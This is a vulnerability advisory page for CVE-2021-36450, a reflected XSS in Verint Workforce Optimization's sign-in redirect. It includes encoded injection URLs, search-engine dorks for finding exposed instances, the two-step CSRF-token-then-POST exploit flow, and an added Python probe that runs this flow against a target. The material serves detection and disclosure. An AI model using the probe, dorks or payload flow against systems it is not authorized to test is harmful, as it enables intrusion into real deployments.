CVE-2021-36450
published 2021-12-15

CVE-2021-36450: Verint Workforce Optimization (WFO) 15.2.8.10048 allows XSS via the control/my_notifications NEWUINAV parameter.

Priority: P3 57
CVSS 3.1: 6.1 medium (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
Exploit: yes
EPSS: 68.86% (99.3rd percentile)

Affected

1 range
Vendor   Product                 Version range   Fixed in
verint   workforce_optimization  (not given)     (not given)

Detection & IOCs (extracted from sources)

url:  /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3C%2Fh1%3E26
url:  /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3Ch1%3E%26
path: /wfo/control/my_notifications
path: /wfo/control/signin
  • Shodan/FOFA fingerprint for identifying exposed Verint WFO instances: search for login page title 'Verint Sign-in'.
  • FOFA query to identify Verint WFO instances: title="verint sign-in".
  • Google dork to identify Verint WFO instances: intitle:"verint sign-in".
  • The POST body to the signin endpoint includes the browserCheckEnabled, username and csrfp_login fields; the CSRF token is taken from the Set-Cookie header of the preceding GET with the regex csrfp_login=([a-zA-Z0-9]+); and reused to chain the two-step exploit.
  • Content-Type for the POST exploitation request must be application/x-www-form-urlencoded.
  • Exploitation is a two-step process: first a GET to the signin endpoint to extract the csrfp_login CSRF token from the Set-Cookie header, then a POST to the signin endpoint with the token and the XSS payload embedded in the 'rd' redirect parameter, which targets NEWUINAV on my_notifications.
  • The vulnerability is confirmed only on Verint Workforce Optimization version 15.2.8.10048; other versions are not confirmed vulnerable by the available sources.
  • Detection requires following up to 2 redirects after the POST request to observe the reflected XSS payload in the final response body.
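A detection probe for the two-step flow above, written here as an added example: it is not the page's, Verint's, or the Nuclei template's code. It assumes the rd parameter rides on the POST's query string as in the IOC URLs, that browserCheckEnabled=true and an arbitrary username are accepted (the login does not need to succeed), and that the target is reachable at a base URL such as https://host. Only the Python standard library is used; the sample Set-Cookie and response bodies in the helper docstrings are constructed.

```python
import html
import re
import sys
import urllib.error
import urllib.parse
import urllib.request
from http.cookiejar import CookieJar
from typing import Optional

# Paths from the page's IOC list.
SIGNIN = "/wfo/control/signin"
NOTIFICATIONS = "/wfo/control/my_notifications"
# Harmless marker used by the page's PoC; it must come back unencoded to count as XSS.
MARKER = "<h1>Test</h1>"
# Regex quoted on the page for pulling the token out of Set-Cookie.
CSRF_RE = re.compile(r"csrfp_login=([a-zA-Z0-9]+);")
MAX_REDIRECTS = 2


def extract_csrf(set_cookie: str) -> Optional[str]:
    """Return the csrfp_login value from a Set-Cookie header string, or None."""
    m = CSRF_RE.search(set_cookie)
    return m.group(1) if m else None


def build_signin_url(base_url: str, marker: str = MARKER) -> str:
    """Sign-in URL with the marker injected into NEWUINAV via the rd parameter.

    rd is URL-encoded exactly once; the leading '">' closes the attribute the
    parameter is reflected into on my_notifications.
    """
    rd_target = NOTIFICATIONS + '?NEWUINAV=">' + marker
    return base_url.rstrip("/") + SIGNIN + "?" + urllib.parse.urlencode({"rd": rd_target})


def build_post_body(token: str, username: str = "probe") -> str:
    """Form body for the POST step. browserCheckEnabled=true and the username
    value are assumptions; the page only names the fields, not their values."""
    return urllib.parse.urlencode({
        "browserCheckEnabled": "true",
        "username": username,
        "csrfp_login": token,
    })


def reflection_state(body: str, marker: str = MARKER) -> str:
    """'raw' = marker reflected unencoded (vulnerable), 'encoded' = reflected
    but HTML-escaped (not exploitable), 'absent' = not reflected at all."""
    if marker in body:
        return "raw"
    if html.escape(marker, quote=False) in body:
        return "encoded"
    return "absent"


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Surface 3xx responses as HTTPError so fetch() can cap the hops itself."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def fetch(opener, url: str, data: Optional[bytes] = None, follow: int = MAX_REDIRECTS):
    """GET (or POST when data is given) url, following at most `follow` redirects.
    Returns (status, headers, body)."""
    for _ in range(follow + 1):
        req = urllib.request.Request(url, data=data, method="POST" if data else "GET")
        if data:
            req.add_header("Content-Type", "application/x-www-form-urlencoded")
        try:
            with opener.open(req, timeout=15) as resp:
                return resp.status, resp.headers, resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as err:
            loc = err.headers.get("Location")
            if err.code in (301, 302, 303, 307, 308) and loc:
                url, data = urllib.parse.urljoin(url, loc), None  # hops after a 3xx are GETs
                continue
            return err.code, err.headers, err.read().decode("utf-8", "replace")
    raise RuntimeError(f"more than {follow} redirects from {url}")


def check(base_url: str) -> dict:
    """Run the two-step probe against base_url (e.g. https://host) and report."""
    opener = urllib.request.build_opener(
        urllib.request.HTTPCookieProcessor(CookieJar()), _NoRedirect())
    # Step 1: GET the sign-in page and harvest csrfp_login from Set-Cookie.
    _, hdrs, _ = fetch(opener, base_url.rstrip("/") + SIGNIN)
    cookies = hdrs.get_all("Set-Cookie") or []
    token = extract_csrf("; ".join(cookies) + ";")  # trailing ';' satisfies the page's regex
    if token is None:
        return {"token": None, "state": "no-csrf-token"}
    # Step 2: POST the form with the token; rd carries the payload in the query string.
    status, _, body = fetch(opener, build_signin_url(base_url),
                            build_post_body(token).encode())
    return {"token": token, "status": status, "state": reflection_state(body)}


if __name__ == "__main__":
    print(check(sys.argv[1]))
```

Run as `python probe.py https://host`. A result of "raw" means the marker came back unencoded in the body reached after at most two redirects, which is what the sources describe as confirmation; "encoded" means the application escaped it and the instance is not exploitable via this path; "no-csrf-token" means the first GET did not set csrfp_login, so the sign-in flow differs from the one the sources describe and the probe says nothing about the version. The page's regex needs a ';' after the token, which is why one is appended before matching.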

CVSS provenance

NVD v3.1: 6.1 MEDIUM  CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
NVD v2.0: 4.3 MEDIUM  AV:N/AC:M/Au:N/C:N/I:P/A:N